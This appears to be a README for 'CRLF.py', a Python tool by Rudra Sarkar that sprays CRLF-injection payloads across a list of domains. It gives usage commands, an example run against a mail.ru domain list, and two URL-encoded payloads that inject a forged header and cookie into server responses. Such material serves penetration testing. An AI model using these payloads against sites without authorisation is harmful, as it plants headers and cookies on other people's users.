CRLF.py

CRLF - Auto CRLF Injector

Author: Rudra Sarkar

Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.

Compatibility:

• Any platform using Python 2.7

Requirements:

• Python 2.7
• Modules: requests

Install Requests Modules:

$ pip install requests

Usage:

$ python crlf.py

Use $ python crlf.py [domain_list.ext] [crlf_payload]

e.g $ python crlf.py mail.ru.list /%0aevil-here:malicious_cookie1

Payloads:

/%0aevil-here:malicious_cookie1

/%0d%0aevil-here:malicious_cookie1

Screenshot:

Process:

    Regards!

Rudra Sarkar